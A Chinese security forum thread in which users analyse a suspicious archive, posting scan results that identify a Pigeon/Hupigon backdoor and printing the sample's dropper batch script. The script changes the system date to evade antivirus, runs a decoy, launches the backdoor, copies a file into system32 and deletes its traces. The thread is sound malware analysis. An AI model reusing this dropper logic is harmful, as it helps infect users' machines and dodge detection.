大家帮忙看看

2founder

大家帮忙看看,分析一下

sangar

deleted: virus Trojan.Generic (modification)        File: C:\Users\xxxx\Desktop\123.rar/123\520.EXE//data0000.cab/520.exe/520.exe//NSPack//VPacker

The EQs

File:  123.rar  
Status:  INFECTED/MALWARE  
MD5:  99a2560c589f178e24d32b3e749cbd1b  
Packers detected:  NSPACK, VPACKER
Bit9 reports:  File not found  

Scanner results  
Scan taken on 20 Jun 2007 16:11:16 (GMT)  
A-Squared  Found nothing
AntiVir  Found nothing
ArcaVir  Found nothing
Avast  Found nothing
AVG Antivirus  Found nothing
BitDefender  Found Packer.Malware.VPacker.B  
ClamAV  Found nothing
Dr.Web  Found BackDoor.Pigeon.1604, Trojan.Dater  
F-Prot Antivirus  Found nothing
F-Secure Anti-Virus  Found nothing
Fortinet  Found nothing
Kaspersky Anti-Virus  Found nothing
NOD32  Found nothing
Norman Virus Control  Found nothing
Panda Antivirus  Found nothing
Rising Antivirus  Found nothing
VirusBuster  Found Packed/NSPack  
VBA32  Found MalwareScope.Backdoor.Hupigon.1

Whkroran

detected: virus Trojan.Generic (modification)        URL: http://bbs.kafan.cn/attachment.p ... xe//NSPack//VPacker

d9shun

AntiVir  Found nothing

蓝色牛仔裤

[Scan path] C:\Documents and Settings\Administrator\桌面\123.rar
>>>C:\Documents and Settings\Administrator\桌面\123.rar\123\520.EXE\520.exe\520.exe infected with BackDoor.Pigeon.1604
>>C:\Documents and Settings\Administrator\桌面\123.rar\123\520.EXE\520.exe - archive contains infected objects
>>C:\Documents and Settings\Administrator\桌面\123.rar\123\520.EXE\521.exe infected with Trojan.Dater
>C:\Documents and Settings\Administrator\桌面\123.rar\123\520.EXE - archive contains infected objects
C:\Documents and Settings\Administrator\桌面\123.rar - archive contains infected objects

欠妳緈諨

原帖由 EQ2 于 2007-6-21 00:08 发表
File:  123.rar  
Status:  INFECTED/MALWARE  
MD5:  99a2560c589f178e24d32b3e749cbd1b  
Packers detected:  NSPACK, VPACKER
Bit9 reports:  File not found  

Scanner results  
Scan taken on  ...

JOTTI上的AVAST最喜欢乌龙！正牌AVAST报，壳加太多了，看不到病毒名称！

solcroft

有趣的图标，文件种类是Win32 Cabinet Self-extractor
解压，跳出两个东西，一个执行后解放批处理

1. ::===============================================
   
2. Set date=%date%
   
3. date 1980-01-01
   
4. date 1980-01-01
   
5. ::======运行表面程序==========================
   
6. %systemroot%\temp\1.bmp
   
7. ::========倒计时等待10秒======================
   
8. @Echo Off & setlocal enableextensions
   
9. Echo WScript.Sleep 1000 > %temp%.\tmp$$$.vbs
   
10. Set /a i = 15
    
11. :Timeout
    
12. If %i% == 0 Goto Next
    
13. setlocal
    
14. Set /a i = %i% - 1
    
15. cscript //nologo %temp%.\tmp$$$.vbs
    
16. Goto Timeout
    
17. Goto End
    
18. ::===========倒计时等待结束运行鸽子=============
    
19. :Next
    
20. %systemroot%\temp\520.exe
    
21. Copy %systemroot%\temp\mv.SCR %systemroot%\system32\
    
22. For %%f In (%temp%.\tmp$$$.vbs*) Do Del %%f
    
23. ::======恢复时间(卡巴监控)=======================
    
24. date %date%
    
25. ::=========清除痕迹============================
    
26. RD /S /Q %systemroot%\temp\

复制代码

另一个么...

欠妳緈諨

原来是鸽子

The EQs

解压后报了鸽子。。。。。无语ing。。